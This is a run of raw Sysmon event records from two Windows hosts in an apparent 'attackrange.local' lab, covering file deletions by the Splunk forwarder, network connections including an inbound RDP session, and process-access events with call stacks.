08:00:30.290{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA9E47D821245145A99D09689C50F53A,SHA256=7817F3F63F706F63EE9B264AFC7BC7BAC94EF4D90693057877E31EE957F7F20C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052046Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:30.967{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=93CF72DAEF49F1A44EFC0DF9D3456C94,SHA256=6FC18F2166A6AF940D3508507DCF10FAD4508C873842725A66F341B229C46155,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052045Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:30.967{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F8DEAA4DD6676A1438A4C4E02F64462E,SHA256=AB2F7064D4858C91C72FFC8247304BC178E67DE3C67A538C936C37DC32636609,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052044Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:30.037{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43F44EE968625FF9DEFE991D89A7B630,SHA256=3C4A419998C7284BED5D5E66A395B926DC92673070E62EC0251A28A5914F897A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809094Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:30.165{0C1E0330-0490-60E8-1200-00000000D001}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=50EB95A58DF742083A367C084B245753,SHA256=B1CDA85E974EBD15708C541C8B550B42EC1084C14FC13EC3E27E873995F634C6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809093Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:27.220{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT 
AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57370-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000809096Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:31.322{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ACCD4748F55CD8E002E4BEACC107FD1F,SHA256=46222066880C24F6C6E9017AA1E937ABBD19D33D016FB4D7AB9FAB0CA974432A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052048Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:23.771{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51147-false10.0.1.12-8000- 23542300x80000000000000001052047Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:31.068{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D30FB793AD821EB71CB4B172D2ED6B1E,SHA256=8227288BECE44202D82B1E94B998C67AF13D5C6011A8E0F6C527BB4CF4F2E9F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809097Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:32.353{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D564AA63AD7786103DE493BED863098D,SHA256=6529E6B2BA46041E4B652E8120723048E83EDDA1E62B1C5ADFDC0E178FF8C170,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052049Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:32.082{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF9A3B89557E28FACC8C50833B89BE50,SHA256=963C451B1C04CDC95F731DA4B37405FBCFC8747E5C2509DD85EEF14CDD9B6970,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809098Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:33.400{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B00293AD05642F5316FFF96940E0273,SHA256=22E39502C674AB23AB5F579C54A4FC8C32BCC4C7F5F2285AB5E65DA93BAEA407,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052051Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:33.120{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-6E0B-00000000CF01}6608C:\Windows\System32\rdpclip.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001052050Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:33.100{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F22A9E87A911FB16B33E6CCABB0C9F0,SHA256=65486115665F335C889BCED6BA6B68DB45E38A886E089F3ECA0E6E3E8FF149F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809102Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:34.415{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=118E29ED0830EDFB2CD73B6C0F9D70C3,SHA256=4FC504E270FFCF322238F0B05B8CC5C9A34E6D35E51101AE91ADC4DB947D985B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052052Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:34.135{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36ED00A1EC6155259E90B03A3950FE0E,SHA256=D883256A664469F5635ED79F6FF1D02BF7229D60394CD2CBE518D7DE04EF6E6D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809101Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:34.290{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E84E28C1FD04C4B0E70EA130AF10CC3C,SHA256=7D6FDDD5295D74EC3D5F91DB7D940AFF4EE7FD19BABDFC16D5A41D462D702FB2,IMPHASH=00000000000000000000000000000000falsetrue 
354300x8000000000000000809100Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:32.768{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.218-28399-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 354300x8000000000000000809099Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:32.391{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57371-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000809103Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:35.418{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A09D90666857CE10206C3DDC44E3A33,SHA256=D3F795FBB5D4823AB0F290C981ABB1D98D4FBF5F8089ACEF15B65A371D26B2B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052054Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:35.151{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DFCDB1FD00263BFF4D5BAC33410257D,SHA256=2B0DA69AB06F668CF92E595A29A1093D37F6D004FAA4215FC9BAA7F0938A2BF1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052053Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:35.035{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000809104Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:36.449{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=09D597A27C4E9CDE01E5C40DC1787145,SHA256=1E5458F1BF58BFA6F0AC7100CBB99BA983048F25010550E39F35D3F41116FAE4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052077Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:36.781{466BC892-02AF-60E8-1300-00000000CF01}9761504C:\Windows\system32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x100040C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+63c9|c:\windows\system32\cryptsvc.dll+62d1|c:\windows\system32\cryptsvc.dll+5e56|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001052076Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:36.765{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052075Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:36.765{466BC892-02B0-60E8-1600-00000000CF01}13047328C:\Windows\System32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052074Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:36.765{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052073Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:36.765{466BC892-F6A4-60EB-A17D-00000000CF01}9872136C:\Windows\System32\consent.exe{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exe0x70C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\consent.exe+1452|C:\Windows\System32\consent.exe+3ca7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052072Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:36.750{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001052071Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:36.750{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052070Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:36.734{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052069Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:36.734{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052068Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:36.734{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052067Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:36.734{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052066Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:36.734{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052065Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:36.734{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052064Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:36.734{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\appinfo.dll+2073|c:\windows\system32\appinfo.dll+2c4f|c:\windows\system32\appinfo.dll+4026|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052063Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:36.718{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1014c0C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\appinfo.dll+33d8|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052062Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:36.718{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052061Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
